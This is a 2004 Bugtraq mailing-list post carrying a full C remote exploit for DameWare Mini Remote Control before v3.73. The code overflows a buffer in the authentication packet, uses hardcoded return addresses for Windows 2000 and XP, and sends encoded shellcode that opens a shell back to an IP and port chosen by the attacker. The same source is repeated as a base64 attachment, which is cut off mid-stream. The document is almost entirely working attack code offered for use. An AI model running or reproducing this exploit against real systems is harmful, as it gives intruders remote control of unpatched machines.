[33054] in bugtraq
DameWare Mini Remote Control < v3.73 remote exploit by kralor]
daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Iv=E1n_Rodriguez_Al)
Mon Jan 12 12:46:34 2004
Message-ID: <2493.81.53.157.122.1073759518.squirrel@webmail.familleboily.net>
Date: Sat, 10 Jan 2004 19:31:58 +0100 (CET)
From: =?iso-8859-1?Q?Iv=E1n_Rodriguez_Almui=F1a?= <kralor@coromputer.net>
To: bugtraq@securityfocus.com
Reply-To: kralor@coromputer.net
MIME-Version: 1.0
Content-Type: multipart/mixed;boundary="----=_20040110193158_35264"
------=_20040110193158_35264
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
/**************************************************************************************/
/* [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by
kralor [Crpt] */
/* - - - - - - - - - - - - - - - - - -
- - - */
/* 8/10 win2k successfully exploited in blind mode (lang & type
[pro,srv,etc] unknown)*/
/* tested against dameware versions: v3.68 v3.72
*/
/* In comments there's some information about offsets for jmp esp on diff
OS. */
/* I've fixed a problem in the shellc0de, when I check for kernel32.dll,
on winXP it */
/* is kernel32.dll, but on win2k it is KERNEL32.DLL (both in unicode
format) */
/* shellc0de is a bit long for this b0f, so ExitThread won't be called,
but it is in */
/* the shellcode.Some people reported me 3 different offsets for winXP
pro, home, sp0 */
/* or sp1, so I don't know why it's different and I haven't XP at home I
can't find */
/* another better EIP for XP (hope this 3 offsets will be enough for XP).
*/
/* greetz: MrNice,AnAc,TripaX & Decryptus for helping me to find the EIP
values. */
/*....................................................................................*/
/* informations: kralor[at]coromputer.net,www.coromputer.net,irc undernet
#coromputer */
/**************************************************************************************/
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment (lib,"ws2_32")
/*
0x717564B8 jmp esp in comctl32.dll
win2k fr adv srv sp2
win2k en adv srv sp3
win2k en adv srv sp4
win2k en srv sp3
win2k fr pro sp3
win2k en pro sp4
*/
#define RET_XP_VAR0 "\x07\xD5\x36\x77"
#define RET_XP_VAR1 "\xC1\x1C\x35\x77" // these offsets has been reported
by many people
#define RET_XP_VAR2 "\xC1\x1C\x39\x77"
#define RET_WIN2k "\xB8\x64\x75\x71"
#define PORT 6129
#define SIZEOF 4096
#define WINUSER "h4x0r"
#define WINHOST "l33t_home"
#define USERPROFILE_NAME "script kiddie"
#define USERPROFILE_COMPANY "g33k solutions."
#define USERPROFILE_LICENSE "11111-OEM-0001111-11111"
#define USERPROFILE_DATE "12/24/03 00:00:00"
#define INTERFACE_IP "192.168.1.1,192.168.1.2"
#define WINDOMAIN "l33t_d0m41n"
#define CLIENT_VERSION "3.72.0.0"
int cnx(char *host)
{
int sock;
struct sockaddr_in yeah;
struct hostent *she;
sock=socket(AF_INET,SOCK_STREAM,0);
if(!sock) {
printf("error: unable to create socket\r\n");
return 0;
}
yeah.sin_family=AF_INET;
yeah.sin_addr.s_addr=inet_addr(host);
yeah.sin_port=htons(PORT);
if((she=gethostbyname(host))!=NULL) {
memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
} else {
if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
printf("error: cannot resolve host\r\n");
return 0;
}
}
printf("[+] Connecting to %-30s ...",host);
if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
printf("error: connection refused\r\n");
return 0;
}
printf("Done\r\n");
return sock;
}
void set_sc(int os, char *rhost, int rport, char *shellc0de)
{
unsigned int ip=0;
unsigned short port=0;
char *port_to_shell="",*ip1="";
ip = inet_addr(rhost); ip1 = (char*)&ip;
shellc0de[325]=ip1[0]^0x95;shellc0de[326]=ip1[1]^0x95;
shellc0de[327]=ip1[2]^0x95; shellc0de[328]=ip1[3]^0x95;
port = htons(rport);
port_to_shell = (char *) &port;
shellc0de[319]=port_to_shell[0]^0x95;
shellc0de[320]=port_to_shell[1]^0x95;
if(os==1) {
shellc0de[167]=shellc0de[215]=(unsigned char)0xfe;
shellc0de[345]=shellc0de[453]=(unsigned char)0xfe;
}
return;
}
int start_auth(int sock, char *rhost, int rport, int var)
{
int size,i=4,os;
char buffer[SIZEOF];
char shellc0de[] =
"\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef"
"\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xba\x01\x80\x33\x95"
"\x43\xe2\xfa\x7e\xfa\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e"
"\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad"
"\x8b\xe0\xdd\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d"
"\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96"
"\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3"
"\xae\xe1\xb1\x8d\xe1\x93\xde\xb6\x4e\xe0\x7f\x56\xca\xa6\x5c\xf3"
"\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e\x8d\x1e\x56\xae"
"\x54\xe0\x34\x56\x16\x79\xd5\x1e\x79\x14\x79\xb5\x97\x95\x95\xfd"
"\xec\xd0\xed\xd4\xff\x9f\xff\xde\xff\x95\x7d\xe3\x6a\x6a\x6a\xa6"
"\x5c\x52\xd0\x69\xe2\xe6\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8"
"\x97\x1e\x48\xf3\x16\x7e\x91\xc4\xc4\xc6\x6a\x45\x1c\xd0\x91\xfd"
"\xe7\xf0\xe6\xe6\xff\x9f\xff\xde\xff\x95\x7d\xd3\x6a\x6a\x6a\x1e"
"\xc8\x91\x1c\xc8\x12\x1c\xd0\x02\x52\xd0\x69\xc2\xc6\xd4\xc6\x52"
"\xd0\x95\xfa\xf6\xfe\xf0\x52\xd0\x91\xe1\xd4\x95\x95\x1e\x58\xf3"
"\x16\x7c\x91\xc4\xc6\x6a\x45\xa6\x4e\xc6\xc6\xc6\xc6\xff\x94\xff"
"\x97\x6a\x45\x1c\xd0\x31\x52\xd0\x69\xf6\xfa\xfb\xfb\x52\xd0\x95"
"\xf0\xf6\xe1\x95\x1e\x58\xf3\x16\x7c\x91\xc4\x6a\xe0\x12\x6a\xc0"
"\x02\xa6\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97\x97"
"\x0f\x96\x46\x52\x97\x55\x3d\x94\x94\xff\x85\xc0\x6a\xe0\x31\x6a"
"\x45\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xff\x95\x7d\x51\x6b\x6a"
"\x6a\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d"
"\x1c\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52"
"\xd0\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xd8\x31\x1c"
"\xd8\x71\x1c\xd8\x7d\x1c\xd8\x79\x18\xd8\x65\xc4\x18\xd8\x39\xc4"
"\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52\xd0"
"\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xfd\xed\xfc"
"\xe1\xc1\xff\x94\xff\xde\xff\x95\x7d\xcd\x6b\x6a\x6a\x6a";
size=recv(sock,buffer,SIZEOF,0);
if(buffer[0]!=0x30||buffer[1]!=0x11) {
printf("error: wrong data received\r\n");
return -1;
}
buffer[28]=0x00;buffer[36]=0x01;
send(sock,buffer,size,0);
memset(buffer,0,SIZEOF);
printf("[+] Gathering %-30s ...","information");
for(size=0;size<4096;size+=recv(sock,&buffer[size],SIZEOF,0));
if(buffer[0]!=0x10||buffer[1]!=0x27) {
printf("error: wrong data received\r\n");
return -1;
}
printf("Done\r\n");
printf("[i] Operating system : ");
if(buffer[16]==0x28||buffer[17]==0x0a) {
os=1;
printf("WinXP");
} else {
printf("Win2000");
os=0;
}
printf("\r\n[i] Service Pack : %s\r\n",!buffer[37]?"0":&buffer[37]);
printf("[+] Setting shellc0de for this %-15s ...","version");
set_sc(os,rhost,rport,shellc0de);
memset(&buffer[2],0,SIZEOF-2);
strcpy(&buffer[175],WINUSER);
memset(&buffer[416],0x90,180);
printf("Done\r\n");
if(os==0)
memcpy(&buffer[516],RET_WIN2k,4);
else {
if(var==0) {
printf("[!] Using 0x7736d507 as ret addr\r\n");
memcpy(&buffer[516],RET_XP_VAR0,4);
} else {
if(var==1) {
memcpy(&buffer[516],RET_XP_VAR1,4);
printf("[!] Using 0x77351cc1 as ret addr\r\n");
} else {
memcpy(&buffer[516],RET_XP_VAR2,4);
printf("[!] Using 0x77391cc1 as ret addr\r\n");
}
}
}
memcpy(&buffer[520],shellc0de,sizeof(shellc0de));
strcpy(&buffer[1200],WINHOST);strcpy(&buffer[975],USERPROFILE_NAME);
strcpy(&buffer[1295],USERPROFILE_COMPANY);strcpy(&buffer[1495],USERPROFILE_LICENSE);
strcpy(&buffer[1755],USERPROFILE_DATE);strcpy(&buffer[2015],WINHOST);
strcpy(&buffer[2275],INTERFACE_IP);strcpy(&buffer[2535],WINDOMAIN);
strcpy(&buffer[2795],CLIENT_VERSION);
printf("[+] Sending evil %-30s ...","packet");
send(sock,buffer,SIZEOF,0);
memset(buffer,0,SIZEOF);
size=recv(sock,buffer,SIZEOF,0);
if(buffer[0]!=0x32||buffer[1]!=0x11) {
printf("Patched\r\n");
return -1;
}
printf("Done\r\n");
printf("[i] Shell should be arrived at %s:%d\r\n",rhost,rport);
return 0;
}
void banner(void)
{
printf("\r\n [Crpt] DameWare Mini Remote Control < v3.73 remote exploit
by kralor [Crpt]\r\n");
printf("\t\t www.coromputer.net && undernet #coromputer\r\n\r\n");
return;
}
void syntax(char *prog)
{
printf("syntax: %s <host> <your_ip> <your_port> [winXP variant]\r\n",prog);
printf("winXP variante:\r\n");
printf(" will use 0x7736d507 as eip [found on many
XPs][default]\r\n");
printf(" 1 will use 0x77351cc1 as eip [found on many
XPs]\r\n");
printf(" 2 will use 0x77391cc1 as eip [found on one XP
sp0]\r\n");
return;
}
int main(int argc, char *argv[])
{
WSADATA wsaData;
int sock,var=0;
banner();
if(argc<4||argc>5) {
syntax(argv[0]);
return -1;
}
if(argc==5) {
var=atoi(argv[4]);
if(var>2||var<0) {
syntax(argv[0]);
return -1;
}
}
if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error: unable to load winsock\r\n");
return -1;
}
sock=cnx(argv[1]);
if(!sock)
return -1;
start_auth(sock,argv[2],atoi(argv[3]),var);
return 0;
}
------=_20040110193158_35264
Content-Type: application/octet-stream; name="DameWeird.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="DameWeird.c"
LyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqLw0KLyogICAgIFtDcnB0XSBEYW1lV2FyZSBN
aW5pIFJlbW90ZSBDb250cm9sIDwgdjMuNzMgcmVtb3RlIGV4cGxvaXQgYnkga3JhbG9yIFtDcnB0
XSAgICAqLw0KLyogLSAgIC0gICAtICAgLSAgIC0gICAtICAgLSAgIC0gICAtICAgLSAgIC0gICAt
ICAgLSAgIC0gICAtICAgLSAgIC0gICAtICAgLSAgIC0gICAtICAqLw0KLyogOC8xMCB3aW4yayBz
dWNjZXNzZnVsbHkgZXhwbG9pdGVkIGluIGJsaW5kIG1vZGUgKGxhbmcgJiB0eXBlIFtwcm8sc3J2
LGV0Y10gdW5rbm93bikqLw0KLyogdGVzdGVkIGFnYWluc3QgZGFtZXdhcmUgdmVyc2lvbnM6IHYz
LjY4ICB2My43MiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqLw0KLyogSW4g
Y29tbWVudHMgdGhlcmUncyBzb21lIGluZm9ybWF0aW9uIGFib3V0IG9mZnNldHMgZm9yIGptcCBl
c3Agb24gZGlmZiBPUy4gICAgICAgICAqLw0KLyogSSd2ZSBmaXhlZCBhIHByb2JsZW0gaW4gdGhl
IHNoZWxsYzBkZSwgd2hlbiBJIGNoZWNrIGZvciBrZXJuZWwzMi5kbGwsIG9uIHdpblhQIGl0ICAq
Lw0KLyogaXMga2VybmVsMzIuZGxsLCBidXQgb24gd2luMmsgaXQgaXMgS0VSTkVMMzIuRExMIChi
b3RoIGluIHVuaWNvZGUgZm9ybWF0KSAgICAgICAgICAqLw0KLyogc2hlbGxjMGRlIGlzIGEgYml0
IGxvbmcgZm9yIHRoaXMgYjBmLCBzbyBFeGl0VGhyZWFkIHdvbid0IGJlIGNhbGxlZCwgYnV0IGl0
IGlzIGluICAqLw0KLyogdGhlIHNoZWxsY29kZS5Tb21lIHBlb3BsZSByZXBvcnRlZCBtZSAzIGRp
ZmZlcmVudCBvZmZzZXRzIGZvciB3aW5YUCBwcm8sIGhvbWUsIHNwMCAqLw0KLyogb3Igc3AxLCBz
byBJIGRvbid0IGtub3cgd2h5IGl0J3MgZGlmZmVyZW50IGFuZCBJIGhhdmVuJ3QgWFAgYXQgaG9t
ZSBJIGNhbid0IGZpbmQgICAqLw0KLyogYW5vdGhlciBiZXR0ZXIgRUlQIGZvciBYUCAoaG9wZSB0
aGlzIDMgb2Zmc2V0cyB3aWxsIGJlIGVub3VnaCBmb3IgWFApLiAgICAgICAgICAgICAqLw0KLyog
Z3JlZXR6OiBNck5pY2UsQW5BYyxUcmlwYVggJiBEZWNyeXB0dXMgZm9yIGhlbHBpbmcgbWUgdG8g
ZmluZCB0aGUgRUlQIHZhbHVlcy4gICAgICAqLw0KLyouLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4u
Li4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4u
Li4qLw0KLyogaW5mb3JtYXRpb25zOiBrcmFsb3JbYXRdY29yb21wdXRlci5uZXQsd3d3LmNvcm9t
cHV0ZXIubmV0LGlyYyB1bmRlcm5ldCAjY29yb21wdXRlciAqLw0KLyoqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqLw0KDQojaW5jbHVkZSA8d2luc29jay5oPg0KI2luY2x1ZGUgPHdpbmRvd3Mu
aD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KDQojcHJhZ21hIGNv
bW1lbnQgKGxpYiwid3MyXzMyIikNCg0KLyoNCjB4NzE3NTY0QjggICBqbXAgZXNwIGluIGNvbWN0
bDMyLmRsbA0Kd2luMmsgZnIgYWR2IHNydiBzcDINCndpbjJrIGVuIGFkdiBzcnYgc3AzDQp3aW4y
ayBlbiBhZHYgc3J2IHNwNA0Kd2luMmsgZW4gc3J2ICAgICBzcDMNCndpbjJrIGZyIHBybyAgICAg
c3AzDQp3aW4yayBlbiBwcm8gICAgIHNwNA0KKi8NCg0KI2RlZmluZSBSRVRfWFBfVkFSMCAiXHgw
N1x4RDVceDM2XHg3NyINCiNkZWZpbmUgUkVUX1hQX1ZBUjEgIlx4QzFceDFDXHgzNVx4NzciIC8v
IHRoZXNlIG9mZnNldHMgaGFzIGJlZW4gcmVwb3J0ZWQgYnkgbWFueSBwZW9wbGUNCiNkZWZpbmUg
UkVUX1hQX1ZBUjIgIlx4QzFceDFDXHgzOVx4NzciDQojZGVmaW5lIFJFVF9XSU4yayAgICJceEI4
XHg2NFx4NzVceDcxIg0KDQojZGVmaW5lIFBPUlQgNjEyOQ0KI2RlZmluZSBTSVpFT0YgNDA5Ng0K
I2RlZmluZSBXSU5VU0VSICJoNHgwciINCiNkZWZpbmUgV0lOSE9TVCAibDMzdF9ob21lIg0KI2Rl
ZmluZSBVU0VSUFJPRklMRV9OQU1FICJzY3JpcHQga2lkZGllIg0KI2RlZmluZSBVU0VSUFJPRklM
RV9DT01QQU5ZICJnMzNrIHNvbHV0aW9ucy4iDQojZGVmaW5lIFVTRVJQUk9GSUxFX0xJQ0VOU0Ug
IjExMTExLU9FTS0wMDAxMTExLTExMTExIg0KI2RlZmluZSBVU0VSUFJPRklMRV9EQVRFICIxMi8y
NC8wMyAwMDowMDowMCINCiNkZWZpbmUgSU5URVJGQUNFX0lQICIxOTIuMTY4LjEuMSwxOTIuMTY4
LjEuMiINCiNkZWZpbmUgV0lORE9NQUlOICJsMzN0X2QwbTQxbiINCiNkZWZpbmUgQ0xJRU5UX1ZF
UlNJT04gIjMuNzIuMC4wIg0KDQppbnQgY254KGNoYXIgKmhvc3QpDQp7DQoJaW50IHNvY2s7DQoJ
c3RydWN0IHNvY2thZGRyX2luIHllYWg7DQoJc3RydWN0IGhvc3RlbnQgKnNoZTsNCg0KCXNvY2s9
c29ja2V0KEFGX0lORVQsU09DS19TVFJFQU0sMCk7DQoJaWYoIXNvY2spIHsNCgkJcHJpbnRmKCJl
cnJvcjogdW5hYmxlIHRvIGNyZWF0ZSBzb2NrZXRcclxuIik7DQoJCXJldHVybiAwOw0KCQl9DQoJ
eWVhaC5zaW5fZmFtaWx5PUFGX0lORVQ7IA0KCXllYWguc2luX2FkZHIuc19hZGRyPWluZXRfYWRk
cihob3N0KTsgDQoJeWVhaC5zaW5fcG9ydD1odG9ucyhQT1JUKTsNCg0KaWYoKHNoZT1nZXRob3N0
YnluYW1lKGhvc3QpKSE9TlVMTCkgeyANCgltZW1jcHkoKGNoYXIgKikmeWVhaC5zaW5fYWRkcixz
aGUtPmhfYWRkcixzaGUtPmhfbGVuZ3RoKTsgDQoJfSBlbHNlIHsgDQoJaWYoKHllYWguc2luX2Fk
ZHIuc19hZGRyPWluZXRfYWRkcihob3N0KSk9PUlOQUREUl9OT05FKSB7DQoJCXByaW50ZigiZXJy
b3I6IGNhbm5vdCByZXNvbHZlIGhvc3RcclxuIik7DQoJCXJldHVybiAwOw0KCQl9IA0KCX0NCglw
cmludGYoIlsrXSBDb25uZWN0aW5nIHRvICUtMzBzIC4uLiIsaG9zdCk7DQoJaWYoY29ubmVjdChz
b2NrLChzdHJ1Y3Qgc29ja2FkZHIqKSZ5ZWFoLHNpemVvZih5ZWFoKSkhPTApIHsNCgkJcHJpbnRm
KCJlcnJvcjogY29ubmVjdGlvbiByZWZ1c2VkXHJcbiIpOw0KCQlyZXR1cm4gMDsNCgkJfQ0KCXBy
aW50ZigiRG9uZVxyXG4iKTsNCglyZXR1cm4gc29jazsNCn0NCg0Kdm9pZCBzZXRfc2MoaW50IG9z
LCBjaGFyICpyaG9zdCwgaW50IHJwb3J0LCBjaGFyICpzaGVsbGMwZGUpDQp7DQoJdW5zaWduZWQg
aW50IGlwPTA7DQoJdW5zaWduZWQgc2hvcnQgcG9ydD0wOw0KCWNoYXIgKnBvcnRfdG9fc2hlbGw9
IiIsKmlwMT0iIjsNCg0KCWlwID0gaW5ldF9hZGRyKHJob3N0KTsgaXAxID0gKGNoYXIqKSZpcDsN
CglzaGVsbGMwZGVbMzI1XT1pcDFbMF1eMHg5NTtzaGVsbGMwZGVbMzI2XT1pcDFbMV1eMHg5NTsN
CglzaGVsbGMwZGVbMzI3XT1pcDFbMl1eMHg5NTsgc2hlbGxjMGRlWzMyOF09aXAxWzNdXjB4OTU7
DQoNCglwb3J0ID0gaHRvbnMocnBvcnQpOw0KCXBvcnRfdG9fc2hlbGwgPSAoY2hhciAqKSAmcG9y
dDsNCglzaGVsbGMwZGVbMzE5XT1wb3J0X3RvX3NoZWxsWzBdXjB4OTU7DQoJc2hlbGxjMGRlWzMy
MF09cG9ydF90b19zaGVsbFsxXV4weDk1Ow0KDQoJaWYob3M9PTEpIHsNCgkJc2hlbGxjMGRlWzE2
N109c2hlbGxjMGRlWzIxNV09KHVuc2lnbmVkIGNoYXIpMHhmZTsNCgkJc2hlbGxjMGRlWzM0NV09
c2hlbGxjMGRlWzQ1M109KHVuc2lnbmVkIGNoYXIpMHhmZTsNCgkJfQ0KCXJldHVybjsNCn0NCg0K
aW50IHN0YXJ0X2F1dGgoaW50IHNvY2ssIGNoYXIgKnJob3N0LCBpbnQgcnBvcnQsIGludCB2YXIp
DQp7DQoJaW50IHNpemUsaT00LG9zOw0KCWNoYXIgYnVmZmVyW1NJWkVPRl07DQoJY2hhciBzaGVs
bGMwZGVbXSA9DQogICAgICAgICJceGViXHgwMlx4ZWJceDBmXHg2Nlx4ODFceGVjXHgwNFx4MDhc
eDhiXHhlY1x4ODNceGVjXHg1MFx4ZThceGVmIg0KICAgICAgICAiXHhmZlx4ZmZceGZmXHg1Ylx4
ODBceGMzXHgxMFx4MzNceGM5XHg2Nlx4YjlceGJhXHgwMVx4ODBceDMzXHg5NSINCiAgICAgICAg
Ilx4NDNceGUyXHhmYVx4N2VceGZhXHhhNlx4NGVceDI2XHhhNVx4ZjFceDFlXHg5Nlx4MWVceGQ1
XHg5OVx4MWUiDQogICAgICAgICJceGRkXHg5OVx4MWVceDU0XHgxZVx4YzlceGIxXHg5ZFx4MWVc
eGU1XHhhNVx4OTZceGUxXHhiMVx4OTFceGFkIg0KICAgICAgICAiXHg4Ylx4ZTBceGRkXHgxZVx4
ZDVceDhkXHgxZVx4Y2RceGE5XHg5Nlx4NGRceDFlXHhjZVx4ZWRceDk2XHg0ZCINCiAgICAgICAg
Ilx4MWVceGU2XHg4OVx4OTZceDY1XHhjM1x4MWVceGU2XHhiMVx4OTZceDY1XHhjM1x4MWVceGM2
XHhiNVx4OTYiDQogICAgICAgICJceDQ1XHgxZVx4Y2VceDhkXHhkZVx4MWVceGExXHgwZlx4OTZc
eDY1XHg5Nlx4ZTFceGIxXHg4MVx4MWVceGEzIg0KICAgICAgICAiXHhhZVx4ZTFceGIxXHg4ZFx4
ZTFceDkzXHhkZVx4YjZceDRlXHhlMFx4N2ZceDU2XHhjYVx4YTZceDVjXHhmMyINCiAgICAgICAg
Ilx4MWVceDk5XHhjYVx4Y2FceDFlXHhhOVx4MWFceDE4XHg5MVx4OTJceDU2XHgxZVx4OGRceDFl
XHg1Nlx4YWUiDQogICAgICAgICJceDU0XHhlMFx4MzRceDU2XHgxNlx4NzlceGQ1XHgxZVx4Nzlc
eDE0XHg3OVx4YjVceDk3XHg5NVx4OTVceGZkIg0KICAgICAgICAiXHhlY1x4ZDBceGVkXHhkNFx4
ZmZceDlmXHhmZlx4ZGVceGZmXHg5NVx4N2RceGUzXHg2YVx4NmFceDZhXHhhNiINCiAgICAgICAg
Ilx4NWNceDUyXHhkMFx4NjlceGUyXHhlNlx4YTdceGNhXHhmM1x4NTJceGQwXHg5NVx4YTZceGE3
XHgxZFx4ZDgiDQogICAgICAgICJceDk3XHgxZVx4NDhceGYzXHgxNlx4N2VceDkxXHhjNFx4YzRc
eGM2XHg2YVx4NDVceDFjXHhkMFx4OTFceGZkIg0KICAgICAgICAiXHhlN1x4ZjBceGU2XHhlNlx4
ZmZceDlmXHhmZlx4ZGVceGZmXHg5NVx4N2RceGQzXHg2YVx4NmFceDZhXHgxZSINCiAgICAgICAg
Ilx4YzhceDkxXHgxY1x4YzhceDEyXHgxY1x4ZDBceDAyXHg1Mlx4ZDBceDY5XHhjMlx4YzZceGQ0
XHhjNlx4NTIiDQogICAgICAgICJceGQwXHg5NVx4ZmFceGY2XHhmZVx4ZjBceDUyXHhkMFx4OTFc
eGUxXHhkNFx4OTVceDk1XHgxZVx4NThceGYzIg0KICAgICAgICAiXHgxNlx4N2NceDkxXHhjNFx4
YzZceDZhXHg0NVx4YTZceDRlXHhjNlx4YzZceGM2XHhjNlx4ZmZceDk0XHhmZiINCiAgICAgICAg
Ilx4OTdceDZhXHg0NVx4MWNceGQwXHgzMVx4NTJceGQwXHg2OVx4ZjZceGZhXHhmYlx4ZmJceDUy
XHhkMFx4OTUiDQogICAgICAgICJceGYwXHhmNlx4ZTFceDk1XHgxZVx4NThceGYzXHgxNlx4N2Nc
eDkxXHhjNFx4NmFceGUwXHgxMlx4NmFceGMwIg0KICAgICAgICAiXHgwMlx4YTZceDRlXHgyNlx4
OTdceDFlXHg0MFx4ZjNceDFjXHg4Zlx4OTZceDQ2XHhmM1x4NTJceDk3XHg5NyINCiAgICAgICAg
Ilx4MGZceDk2XHg0Nlx4NTJceDk3XHg1NVx4M2RceDk0XHg5NFx4ZmZceDg1XHhjMFx4NmFceGUw
XHgzMVx4NmEiDQogICAgICAgICJceDQ1XHhmZFx4ZjBceGU2XHhlNlx4ZDRceGZmXHg5Zlx4ZmZc
eGRlXHhmZlx4OTVceDdkXHg1MVx4NmJceDZhIg0KICAgICAgICAiXHg2YVx4YTZceDRlXHg1Mlx4
ZDBceDM5XHhkMVx4OTVceDk1XHg5NVx4MWNceGM4XHgyNVx4MWNceGM4XHgyZCINCiAgICAgICAg
Ilx4MWNceGM4XHgyMVx4MWNceGM4XHgyOVx4MWNceGM4XHg1NVx4MWNceGM4XHg1MVx4MWNceGM4
XHg1ZFx4NTIiDQogICAgICAgICJceGQwXHg0ZFx4OTRceDk0XHg5NVx4OTVceDFjXHhjOFx4NDlc
eDFjXHhjOFx4NzVceDFlXHhkOFx4MzFceDFjIg0KICAgICAgICAiXHhkOFx4NzFceDFjXHhkOFx4
N2RceDFjXHhkOFx4NzlceDE4XHhkOFx4NjVceGM0XHgxOFx4ZDhceDM5XHhjNCINCiAgICAgICAg
Ilx4YzZceGM2XHhjNlx4ZmZceDk0XHhjNlx4YzZceGYzXHg1Mlx4ZDBceDY5XHhmNlx4ZjhceGYz
XHg1Mlx4ZDAiDQogICAgICAgICJceDZiXHhmMVx4OTVceDFkXHhjOFx4NmFceDE4XHhjMFx4Njlc
eGM3XHhjNlx4NmFceDQ1XHhmZFx4ZWRceGZjIg0KICAgICAgICAiXHhlMVx4YzFceGZmXHg5NFx4
ZmZceGRlXHhmZlx4OTVceDdkXHhjZFx4NmJceDZhXHg2YVx4NmEiOw0KDQoJc2l6ZT1yZWN2KHNv
Y2ssYnVmZmVyLFNJWkVPRiwwKTsNCglpZihidWZmZXJbMF0hPTB4MzB8fGJ1ZmZlclsxXSE9MHgx
MSkgew0KCQlwcmludGYoImVycm9yOiB3cm9uZyBkYXRhIHJlY2VpdmVkXHJcbiIpOw0KCQlyZXR1
cm4gLTE7DQoJCX0NCglidWZmZXJbMjhdPTB4MDA7YnVmZmVyWzM2XT0weDAxOw0KCXNlbmQoc29j
ayxidWZmZXIsc2l6ZSwwKTsNCgltZW1zZXQoYnVmZmVyLDAsU0laRU9GKTsNCglwcmludGYoIlsr
XSBHYXRoZXJpbmcgJS0zMHMgICAgIC4uLiIsImluZm9ybWF0aW9uIik7DQoJZm9yKHNpemU9MDtz
aXplPDQwOTY7c2l6ZSs9cmVjdihzb2NrLCZidWZmZXJbc2l6ZV0sU0laRU9GLDApKTsNCg0KCWlm
KGJ1ZmZlclswXSE9MHgxMHx8YnVmZmVyWzFdIT0weDI3KSB7DQoJCXByaW50ZigiZXJyb3I6IHdy
b25nIGRhdGEgcmVjZWl2ZWRcclxuIik7DQoJCXJldHVybiAtMTsNCgl9DQoJcHJpbnRmKCJEb25l
XHJcbiIpOw0KCXByaW50ZigiW2ldIE9wZXJhdGluZyBzeXN0ZW0gOiAiKTsNCglpZihidWZmZXJb
MTZdPT0weDI4fHxidWZmZXJbMTddPT0weDBhKSB7DQoJb3M9MTsNCglwcmludGYoIldpblhQIik7
DQoJfSBlbHNlIHsNCgkJcHJpbnRmKCJXaW4yMDAwIik7DQoJCW9zPTA7DQoJfQ0KCXByaW50Zigi
XHJcbltpXSBTZXJ2aWNlIFBhY2sgICAgIDogJXNcclxuIiwhYnVmZmVyWzM3XT8iMCI6JmJ1ZmZl
clszN10pOw0KCXByaW50ZigiWytdIFNldHRpbmcgc2hlbGxjMGRlIGZvciB0aGlzICUtMTVzICAg
Li4uIiwidmVyc2lvbiIpOw0KCXNldF9zYyhvcyxyaG9zdCxycG9ydCxzaGVsbGMwZGUpOw0KCQ0K
CW1lbXNldCgmYnVmZmVyWzJdLDAsU0laRU9GLTIpOw0KCXN0cmNweSgmYnVmZmVyWzE3NV0sV0lO
VVNFUik7DQoJbWVtc2V0KCZidWZmZXJbNDE2XSwweDkwLDE4MCk7DQoJcHJpbnRmKCJEb25lXHJc
biIpOw0KaWYob3M9PTApDQoJbWVtY3B5KCZidWZmZXJbNTE2XSxSRVRfV0lOMmssNCk7DQplbHNl
IHsNCglpZih2YXI9PTApIHsNCglwcmludGYoIlshXSBVc2luZyAweDc3MzZkNTA3IGFzIHJldCBh
ZGRyXHJcbiIpOw0KCW1lbWNweSgmYnVmZmVyWzUxNl0sUkVUX1hQX1ZBUjAsNCk7DQoJfSBlbHNl
IHsNCgkJaWYodmFyPT0xKSB7DQoJbWVtY3B5KCZidWZmZXJbNTE2XSxSRVRfWFBfVkFSMSw0KTsN
CglwcmludGYoIlshXSBVc2luZyAweDc3MzUxY2MxIGFzIHJldCBhZGRyXHJcbiIpOw0KCQl9IGVs
c2Ugew0KCW1lbWNweSgmYnVmZmVyWzUxNl0sUkVUX1hQX1ZBUjIsNCk7DQoJcHJpbnRmKCJbIV0g
VXNpbmcgMHg3NzM5MWNjMSBhcyByZXQgYWRkclxyXG4iKTsNCgkJfQ0KCX0NCn0NCgltZW1jcHko
